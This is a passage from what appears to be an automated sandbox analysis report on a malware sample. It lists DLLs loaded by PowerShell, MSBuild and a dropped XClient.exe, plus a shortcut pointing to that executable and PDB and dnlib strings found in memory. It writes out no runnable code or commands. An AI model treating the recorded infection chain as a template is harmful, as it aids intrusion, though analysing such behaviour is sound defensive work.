            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: XClient.lnk.12.drLNK file: ..\..\..\..\..\..\Local\XClient.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: root:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ?;oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2607787321.0000000006B20000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.dr
            Source: Binary string: mscorlib.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbMZ@ source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607787321.0000000006B20000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp, WERB0BF.tmp.dmp.22.dr
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Management.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: HP/o0C:\Windows\mscorlib.pdb~ source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: MSBuild.exe, 0000000C.00000002.2579886766.0000000001139000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
